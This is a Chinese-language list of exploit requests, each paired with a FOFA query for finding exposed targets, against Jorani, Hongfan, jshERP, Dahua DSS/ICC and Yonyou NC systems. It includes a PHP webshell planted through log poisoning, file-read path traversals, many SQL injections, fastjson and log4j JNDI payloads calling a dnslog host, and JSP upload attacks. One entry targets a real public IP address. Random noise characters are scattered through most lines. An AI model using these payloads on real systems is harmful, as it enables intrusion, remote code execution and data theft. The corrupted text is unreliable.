Pragma: no-cache q N) q1 Z' D
Cache-Control: no-cache! t: N R) J: e0 K) F
Upgrade-Insecure-Requests: 1
- [: e4 l) [, L3 X) ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
! V& n8 f& w- ]) r% t1 pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ w# V: ^5 J) XAccept-Encoding: gzip, deflate
: F+ `7 ^- K) i$ i3 pAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
0 Y7 w+ \/ _# D3 I: M8 V! eConnection: close* B; | n& }/ i1 ~7 K
$ ?% e7 |, g( U- Y& K/ [
3 s2 r- Y) P# L; E* j8 l# _7 y* K4 H
12. Jorani < 1.0.2 远程命令执行
9 e5 X3 M7 R: X) n$ @FOFA:title="Jorani"/ k/ Z& Q/ M2 W+ V4 @3 Q' T
第一步先拿到cookie& @' O1 ~8 n6 X/ g1 n2 L
GET /session/login HTTP/1.19 |5 p/ X$ I/ R6 c, l' H9 X4 |
Host: 192.168.190.30( Y: B8 `& V) y1 c+ j* F& ^
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36: l6 `+ S+ j, k1 f4 |3 D
Connection: close
( T( L+ L0 h1 p) c$ R8 J' AAccept-Encoding: gzip3 H, x0 V6 p7 i
, |+ S& o( |& m/ [
7 ?! H1 h: `, [ P/ f响应中csrf_cookie_jorani用于后续请求
% B2 h6 ?# A2 P- Q Z% AHTTP/1.1 200 OK. g/ j A V0 i3 t
Connection: close" W# |" o$ X6 K3 F
Cache-Control: no-store, no-cache, must-revalidate
3 N) g8 y+ u W. Z# P) D5 BContent-Type: text/html; charset=UTF-8# w( S# q& |3 j0 W: j: ?
Date: Tue, 24 Oct 2023 09:34:28 GMT9 B; f2 e- ]& w8 E& f
Expires: Thu, 19 Nov 1981 08:52:00 GMT
1 U7 |% P( n7 _+ g# H7 D. yLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT5 a7 e G+ p9 d) {5 d$ }
Pragma: no-cache6 u; l1 o# u0 `
Server: Apache/2.4.54 (Debian), p% U' w9 ^2 {1 o" M
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
3 s* r8 |+ o; }0 oSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
! O" U0 r" X! s S! @Vary: Accept-Encoding- g: a. ]# [ `2 N9 a+ i' t* b1 K% c
r' C$ [/ z8 O7 [1 w7 @
1 G$ A1 r v1 v2 p3 Z/ U. C* H7 b! B
POST请求,执行函数并进行base64编码% A! S) {: Y7 _
POST /session/login HTTP/1.17 R, c, U7 I8 C! p) I
Host: 192.168.190.30
0 J, P$ Y% _$ r6 {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36. r, e3 ?. \2 M4 ], W* g5 F
Connection: close7 H4 g( z) u# R3 v$ P, u Q* ~) ^
Content-Length: 252
P4 \5 z# A4 n3 m; F, CContent-Type: application/x-www-form-urlencoded) \* {/ z* a6 p1 \0 p, _1 S8 J4 N
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r7 Q0 I( D" c/ Y( t6 k
Accept-Encoding: gzip, X4 V' U# `! Z; |) x' D
4 Q; n4 ^3 K& _+ ?- M6 dcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
- H1 d$ w0 C5 S# c7 o1 G" l2 p, X3 X2 u8 I
# I2 {: U6 a1 N6 K { O
$ X9 X, e5 b( H7 ^向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串 ~ Y# W: @: G& r a3 N4 ]2 }
GET /pages/view/log-2023-10-24 HTTP/1.1: w7 h/ Q& T' G; @0 c
Host: 192.168.190.30
: y6 `, F$ A R4 z( S2 UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
- o+ p2 P# m# d e+ u( DConnection: close8 _8 i. B* F/ m+ F( D
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
9 I0 |% G2 m& ~% X. X+ ?K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=1 }6 h0 w! l# I
X-REQUESTED-WITH: XMLHttpRequest1 s, i6 x8 ` m7 }+ O# b6 n
Accept-Encoding: gzip' J& `+ C, }" j. X: p+ r8 y
% V9 r) a- L2 {/ z
" b! [0 c& |2 @$ d6 `4 L13. 红帆iOffice ioFileDown任意文件读取
! W! x" O2 Z Z' n9 eFOFA:app="红帆-ioffice"* q7 e# F0 o2 ^1 u
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
; U1 Y' D$ ]/ |Host: x.x.x.x9 C7 {2 `, W1 P4 o+ k
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
4 `4 b' x# k" ?Connection: close
; i$ a M! _$ b# A% sAccept: */*: m& Q/ F f4 r( P. k- L5 v# N5 t1 @
Accept-Encoding: gzip0 T6 x w2 b8 ]' v
% a( Q- A1 z4 ] U2 L7 e5 p4 n6 r
. J5 j% e: M# f( j4 W9 C c14. 华夏ERP(jshERP)敏感信息泄露
: d, J6 f4 e8 M H: Q" R0 KFOFA:body="jshERP-boot"1 V+ | [5 _6 G# s
泄露内容包括用户名密码
& U- e3 s; S8 G& \GET /jshERP-boot/user/getAllList;.ico HTTP/1.1/ ~' m) m/ J: \ I, E" r
Host: x.x.x.x4 R) Q/ D) G/ x: d! ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
6 W% L2 s, g( g, X% o2 ^$ W. b6 FConnection: close4 I; Z' T! W- h$ t7 y7 |' r& _* A
Accept: */*( X. M# v; S3 A3 W) t8 D+ c
Accept-Language: en
% i2 i$ Q) m! c. P. {; h1 qAccept-Encoding: gzip6 n6 F8 b d1 R; O% [
( _3 n/ n: r6 c4 _6 T
/ x3 k. j0 e1 H% a a4 X15. 华夏ERP getAllList信息泄露
. y. Z1 R: c) c; t4 ~! bCVE-2024-0490: j; e8 o( e8 c9 u6 Z- u) Z8 h
FOFA:body="jshERP-boot"
* x8 i9 B( F- E6 _) l/ Q p% Z泄露内容包括用户名密码" r2 P1 |, {) B
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.12 [* s3 d# s) B l
Host: 192.168.40.130:100* |8 W0 r8 b9 [+ X8 q. x2 s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
5 z0 \$ k6 B x( y9 W& g) vConnection: close) y4 m; h% f2 f: T2 `
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8& k% a. J! X1 \
Accept-Language: en8 o k: D( y% d: ?* l
sec-ch-ua-platform: Windows! n9 S ^4 Y. N: Q1 I
Accept-Encoding: gzip! T0 H- J/ R( ~& n% \8 V
, u" _1 z$ ?. X0 `, w* h$ |* v7 C$ L3 `' z: `: d
16. 红帆HFOffice医微云SQL注入
6 L# `. U1 c ]5 C1 ^1 H# F& I% DFOFA:title="HFOffice"
, m6 p4 n( {# N7 D" [poc中调用函数计算1234的md5值 ^' L) {" X" V# s
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1$ j9 B8 N: o, V4 g
Host: x.x.x.x
# L. T2 U5 Y" f9 \) T0 D, x# BUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
/ N8 J$ x) b& S9 R! `Connection: close5 X. u+ z8 E5 O- d: ^+ U
Accept: */*
6 t: p6 H$ _$ ?; ~Accept-Language: en
7 h" M+ f, @: A7 G7 N+ i& zAccept-Encoding: gzip3 D" e1 }1 C8 y" b+ u% M& |
e( W1 I' I7 P4 a
% B' W7 j" C8 I+ @) V; Z17. 大华 DSS itcBulletin SQL 注入' g3 P0 H' k5 [2 [3 _
FOFA:app="dahua-DSS"
) |: S s; P% ~0 ~POST /portal/services/itcBulletin?wsdl HTTP/1.1
+ b0 N: c! h/ R$ B. b- nHost: x.x.x.x
: O4 E4 q) u/ qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
/ k: {5 x7 }5 |7 h* {/ P2 p2 ^4 AConnection: close/ v* S' H. a, r1 d; o' g& D8 Q# O
Content-Length: 345
( N! A4 E$ X4 D$ {Accept-Encoding: gzip
7 n& [; I" e/ Y; Z x, B* \ M2 R6 A0 l% M
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>* ?; M9 _ N1 w; ~* e' @# F
<s11:Body>
. \1 `7 w0 W/ z" m* w, E w: Y" M <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
; b$ {# X" ^% o5 x6 R1 r5 v <netMarkings>" n! a- A; M- L
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
0 V& [% I/ e! B5 x9 h$ P; D </netMarkings>
& C, }7 O% ~( V+ V% K) U4 S; l7 j </ns1:deleteBulletin>
" O2 [/ J0 w+ Q </s11:Body>1 Q# y2 ?3 B$ Y1 S% d; h
</s11:Envelope>; K7 A# t) v1 ~" \
( C3 ^/ h0 L0 Q) w; U. p5 o y/ d& y7 U1 Q( }2 R4 Q$ n1 x# d R
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露) }! m# M; A4 e: X
FOFA:app="dahua-DSS"8 l- I5 C' ?/ p" e% d+ D2 r8 V8 u C
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
: [) v+ S% w2 |' j" YHost: your-ip! \# t, P- e) @: r' ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 i7 ?1 b) h! gAccept-Encoding: gzip, deflate
! b1 I& A: u. U& j X# wAccept: */*" k1 G4 N5 J7 F; }
Connection: keep-alive5 I. h0 v m. i7 j3 z
& q7 c3 ~. B! ^8 v8 F* d1 P7 Z# ~3 C) v9 Z/ i
4 v5 `! \( J# a, r) O19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入9 s4 g6 q" z2 v& \: j2 i9 y
FOFA:app="dahua-DSS"" o( v% G. O. I
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
% W0 P& O9 S6 P5 aHost:
0 ?; O9 U4 \( M, i. o( kUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.367 _ A- A/ ?6 x, ~
Accept-Encoding: gzip, deflate% H; O$ E4 `# @/ d7 T- P
Accept: */*' n( `0 l1 p4 r9 h( h' m2 n
Connection: keep-alive
6 ]+ |: h# P# i5 B7 j1 x( s: d+ r( q B2 Y% l0 n5 c" [7 {7 I
7 q/ H N0 o2 M
20. 大华ICC智能物联综合管理平台任意文件读取. U2 o4 {1 H+ ~: j" p/ G" l
FOFA:body="*客户端会小于800*", q' m) y5 u+ e; X8 p( Q
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
, b+ ]8 a# |/ X; Z W* D2 oHost: x.x.x.x
+ ]5 ^! s @9 G2 r1 I& tUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36$ |& Y# N3 u! D" t$ P4 f0 w
Connection: close
% o- } T+ q% O) U! M( EAccept: */*/ }% B- H8 t. p$ M( f2 J
Accept-Language: en
F( ` n6 |7 a/ k' L: ?1 d2 q8 ^Accept-Encoding: gzip8 P) o8 y; N6 m( L
; i- y1 [, Q- u4 L% v1 S% _. _" x) H
7 a" o2 o) H' `; x" _0 d+ k21. 大华ICC智能物联综合管理平台random远程代码执行1 i# ]# M! e( J& N; N/ F
FOFA:icon_hash="-1935899595"' u+ s$ P- g1 e# m6 b% ^/ W
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
, @# O- c. q% q' w" G4 m, }Host: x.x.x.x
. C* Z' w* {# WUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' {1 |$ h+ Q1 ~6 F6 d) cContent-Length: 161* Q3 A" @" F% \$ Q
Accept-Encoding: gzip
3 c/ j; }7 y' o) r7 UConnection: close6 M0 s1 a# s5 X; N4 j' T" s
Content-Type: application/json;charset=utf-8
/ X; ?% S8 t* |' J" R+ Q3 H
/ m" v; I* y& ?% f7 m{
B1 B, d& Z0 c"a":{0 l, Y$ b" X& z
"@type":"com.alibaba.fastjson.JSONObject",
- t5 i' p/ C6 N: h, l {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}* r, P" a. }: a$ I- F: t/ {0 j
}""
$ J: O: d2 @! f4 g9 j8 A* D}
* ~7 z' [" d. a+ N! g/ g
! L6 M+ F5 V0 q: B8 E* M7 c
+ v* T. T6 e4 _$ s; z$ O22. 大华ICC智能物联综合管理平台 log4j远程代码执行3 f6 x3 Y9 z/ |* \! _7 V
FOFA:icon_hash="-1935899595"
! P9 S8 J* r1 o+ i3 o& mPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1$ N! H' ]$ u% }& h2 Z' x
Host: your-ip
. K( ^1 Q" ^% \( e$ J0 @5 U. \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 E- C. v& T% V% Z
Content-Type: application/json;charset=utf-8
6 e9 N: P! P5 O' z& S! h+ O6 R- l* y: @/ g% o1 x
{
/ u* g9 u# ]5 p# k: [" p8 Y"loginName":"${jndi:ldap://dnslog}"' B9 r$ j+ u, z( I" a
}1 H# y0 p+ y/ f( `1 ]
7 y2 o) Q: |* V9 ?4 c l6 K4 B
6 z9 f! P* I {# A7 m; L
2 Y: [1 k9 N, m' F23. 大华ICC智能物联综合管理平台 fastjson远程代码执行 }( x4 S8 I' A. e1 t4 k
FOFA:icon_hash="-1935899595"# u6 c6 F6 Z8 ^% Q* d+ y: a
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1. T4 f3 y8 W* L! q; s
Host: your-ip9 H9 ]+ S' u! M2 [6 Y A7 T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& P6 J0 R' C5 d, |8 c6 j9 VContent-Type: application/json;charset=utf-8
# E# M1 M2 k- U, r3 tAccept-Encoding: gzip
3 k7 C1 b- f- Q9 c& l. W$ _Connection: close
0 e3 y* n; l5 f- a5 p! Z }9 _2 {, |2 h: ?" q; K- s
{
+ s- p4 ?8 g2 F! x5 d "a":{
9 _# U( Y6 f& s0 ?, d* C' i z3 { "@type":"com.alibaba.fastjson.JSONObject",
; H* V+ u O% v( K2 u3 w" Z( n4 b {"@type":"java.net.URL","val":"http://DNSLOG"}: ?# S- B6 n8 r7 v1 X. A4 a
}"", P& {2 N( e; P% t# _0 @
}
6 A) n, W! }1 l
, h' r2 S; R7 s1 q( O C* a+ R* n* r
24. 用友NC 6.5 accept.jsp任意文件上传
% E: h4 R8 ]% l# KFOFA:icon_hash="1085941792"
2 @) m: I8 Y5 Q" c1 FPOST /aim/equipmap/accept.jsp HTTP/1.1
, x( i: X! a3 BHost: x.x.x.x6 \. ~ h/ V/ m* V, c
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36' ?" E5 b; d; W! k3 V
Connection: close! H0 x5 k M2 s
Content-Length: 449
) C! x8 g5 Q5 z' }! ^1 H0 sAccept: */*) V$ p7 m! G/ G2 ?4 s0 W
Accept-Encoding: gzip
. R# s2 E) L& Z, \; L+ cContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
6 z# d, u9 i: q& F) B: I: O f* y! M& @* w1 e! J8 J
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
! f% q8 T0 W" ?8 X) zContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
* y* k3 o- A8 \: H) n) F8 xContent-Type: text/plain) Q0 s) H* _& O! w C5 q
. J j$ K+ C- C) f- {$ p# ?
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>5 [: M2 n1 \3 A: ~% O2 U
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc& ?4 \' o: Z( [' x5 @7 ]! T: E
Content-Disposition: form-data; name="fname"
# n9 X. {& a! Q+ w* e
5 Z# ~2 ~+ J+ \0 i\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp4 E- f; U, v* r
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
6 M% ?$ B" g* c+ }4 M5 s
+ n3 \& ?/ \# G& o. W. w1 b( `9 d
25. 用友NC registerServlet JNDI 远程代码执行9 _7 Y# O$ }# x# A
FOFA:app="用友-UFIDA-NC"* P# n- y: Z5 O6 x6 E: g
POST /portal/registerServlet HTTP/1.17 A1 |5 E4 D* F/ ] M4 T. A" Y' C
Host: your-ip
. a8 e1 _: m+ W! N: \9 P6 c( n# oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.08 ~! v: R5 ]8 @4 }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9+ U% P4 T. a' C/ B
Accept-Encoding: gzip, deflate
/ m6 x6 f! P9 u1 ^; k7 z5 GAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6# M* P6 J2 v5 r5 Q' j r# r) b
Content-Type: application/x-www-form-urlencoded
1 E! E8 w& _4 g
. S/ z9 \% Z* `$ L- O9 K7 ^type=1&dsname=ldap://dnslog
8 H6 w* T9 j) W' J2 h6 h; W5 u9 s# P& F! R% O' M: }
4 \7 R7 \4 q" \- n. Y; f6 V
( n3 D C/ o9 B) M9 I2 y, l& q/ Z$ ^! c; k' t
26. 用友NC linkVoucher SQL注入- Q* i- m4 v5 K, x" ~
FOFA:app="用友-UFIDA-NC"
o1 N! W( ^/ ]GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
- \4 |1 {, y* M: J& ^Host: your-ip
( d4 J6 B) S' O, Y u: hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36& t9 i+ M; ^ V' i; A
Content-Type: application/x-www-form-urlencoded1 e* f) {9 B& [7 L- k- ? @) w0 u
Accept-Encoding: gzip, deflate
. Q0 c, m" Y7 V% cAccept: */*
: ~1 y Y1 n6 Q) h; J+ B( EConnection: keep-alive
- ]5 L2 W5 R7 w
2 B+ N4 Z5 U E4 T. G! t
O2 t+ b; \) S" ?0 x27. 用友 NC showcontent SQL注入% `1 p s) z3 n; F. @1 K( Y1 M
FOFA:icon_hash="1085941792"" j( ^5 A. R$ k' W) A' O
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
, _( ~$ b+ k. g# sHost: your-ip. _- [# g/ L+ q" s7 q8 T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
% [( K4 a$ y0 Q! Q4 |# _0 @9 bAccept-Encoding: identity! ?0 q/ O0 |! i# ?" `
Connection: close
O2 A4 g5 B8 UContent-Type: text/xml; charset=utf-83 F' j1 j/ h9 }! i( g; I0 a
5 J% I% H$ O/ B9 }: V' r/ ^
* o5 \3 x9 p0 l4 W2 u q
28. 用友NC grouptemplet 任意文件上传
1 E6 U% K# W* d$ h) s* ^( n. a: zFOFA:icon_hash="1085941792"0 g4 e+ W, d2 {7 P. B1 A, c
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
0 |* [2 p- q$ F' e5 Y$ q; C/ XHost: x.x.x.x* _: `8 g/ s" a7 I' d- ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
6 H: M* h8 [+ ^Connection: close4 D, C4 T& c- u* u" q
Content-Length: 268
/ ^' U V% L! }Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
6 J& P+ C* z1 b1 F* D7 k, qAccept-Encoding: gzip$ W0 }0 G9 i! R* S
& d. ]. C+ ^0 `4 y' J------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk [6 W( e! u8 S7 [7 Q! G
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
! p3 j$ ` @1 O$ c3 sContent-Type: application/octet-stream
, _4 l% Z3 g6 n* a9 j" b+ P8 H* Z2 D6 F
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
6 u6 _* {/ |* W; f------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--- m& W1 s; F, q3 W' I3 [9 Q! K
4 c7 N+ ]6 C' D! b1 E0 Z9 {4 a) E
% w3 {6 W3 O1 l5 c/ X4 U/uapim/static/pages/nc/head.jsp
# h- g9 u- f3 s1 x1 p: M: e0 P
3 w8 Z3 s% y p: F* n! ?, T29. 用友NC down/bill SQL注入
$ e/ U( Q4 H1 v2 {" @( r5 oFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"& {5 ]8 \- t6 j- y: } P# L
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
: J) Q( x& R0 h: c* T& I0 I$ HHost: your-ip
2 J6 H' D7 [/ g& AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
/ _* w9 O- {* \* m* D4 aContent-Type: application/x-www-form-urlencoded
- N' T" M7 |1 |# i7 d; DAccept-Encoding: gzip, deflate- t3 j! N2 F& I
Accept: */*
! ~4 k* j9 B5 ~2 l9 |7 XConnection: keep-alive: Y3 @2 t0 L1 I" J# B7 s$ I2 j
2 C5 [1 l m) e6 q& {6 z" V: M% }: S$ [
30. 用友NC importPml SQL注入
U6 j4 N) ?! K5 H3 N3 FFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
, X8 M" a# A KPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
5 ^& c# O0 m/ |3 e; HHost: your-ip
# ?1 y7 l1 i5 y6 M8 pContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
' d Z7 J0 K( a' `: P$ U; A# r! S- l5 rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36. A; j' t' ?) X( [& g# E
Connection: close
( y. g9 Q+ |# [7 r. n$ Z8 h# e1 w
------WebKitFormBoundaryH970hbttBhoCyj9V# F+ U$ G0 i& Y6 W* w
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
3 u8 f4 p) [. n. S' {3 |Content-Type: image/jpeg9 m+ {$ }; G* W8 X6 m2 t
------WebKitFormBoundaryH970hbttBhoCyj9V--9 | A, I" [9 C# [2 X
/ j7 L6 A) |% s" I
% a/ f' ]( X c- Y# n; s8 t6 @1 |& f$ c+ o
31. 用友NC runStateServlet SQL注入
' x8 j6 S- V& _( k# L G9 K) y' {version<=6.5
/ m6 z7 Y0 a4 Q) ?5 ^: QFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
|' n0 U( G0 |1 zGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
# V3 t* o. a3 e: G$ v+ a" aHost: host
% U1 \% ]3 V1 M TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
0 E' q* ?' o. G% H- b, p8 LContent-Type: application/x-www-form-urlencoded# i# s) @3 r/ Z2 z" G
& S# ]. o' o. F/ b! j$ o
M7 g* G1 M5 V$ S32. 用友NC complainbilldetail SQL注入' q8 `( l9 k( U; ]$ C
version= NC633、NC65
5 T5 C: v3 R5 _& W$ T# d! w4 z! ]. yFOFA:app="用友-UFIDA-NC"
3 o2 b% `* X. v" PGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1, W& J- B$ S% ^2 W3 z/ f
Host: your-ip
/ G8 x$ l4 X0 DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.363 c* J' i `3 t1 l: t) H2 _) }. n
Content-Type: application/x-www-form-urlencoded1 a, G5 O/ I z
Accept-Encoding: gzip, deflate2 l0 J+ c3 Z* L5 Y2 d7 y4 y+ x
Accept: */*9 a Z: l0 P" c0 l
Connection: keep-alive+ m3 C( }1 z, J% \
. Y- q# m5 l$ v8 u y. p
! I9 K% K$ n5 [& k; t$ D33. 用友NC downTax/download SQL注入4 `0 A# y2 s; U0 Y- I
version:NC6.5FOFA:app="用友-UFIDA-NC"
# i* Z/ D5 `3 f, f UGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1& ]) A2 `( q! T0 T' M8 }% V$ G& I
Host: your-ip; c9 g7 D& t2 ?4 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
3 _$ t0 ?% m, R( k7 ?* AContent-Type: application/x-www-form-urlencoded
- b& X3 c V4 W' X2 L* xAccept-Encoding: gzip, deflate2 }3 k8 L+ a" h' I7 ^
Accept: */*# R" P9 C: I1 @' J: V, ~, [' v. M
Connection: keep-alive6 t5 e7 M7 ^$ ~# j
! j9 b8 v# k, q8 d" E0 d
* {% d) Z$ B* D; ]0 A34. 用友NC warningDetailInfo接口SQL注入
3 s& B' C4 S0 ~0 u8 }0 hFOFA:app="用友-UFIDA-NC"% d* I4 f, o; }! H
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
6 l7 B1 \, W; I5 w/ B( @Host: your-ip; D/ J7 P3 ^' ?" O( |7 }( v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Y- n# \% H3 u9 c, UContent-Type: application/x-www-form-urlencoded
8 _( \, c) L/ O6 C" ^Accept-Encoding: gzip, deflate& I# \' Z+ z, G
Accept: */*8 c! {4 |+ \ z" T- V3 b
Connection: keep-alive
* a5 S5 l2 P* T; m) J5 ~3 K( |: g/ @# t' s6 d) i! c! f- x
7 M7 \; p2 f( O5 ?
35. 用友NC-Cloud importhttpscer任意文件上传7 V* Y3 o: U* @' {
FOFA:app="用友-NC-Cloud"8 |4 k# B7 N9 a8 T
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
4 b0 N, ~7 N+ o0 U7 _Host: 203.25.218.166:8888
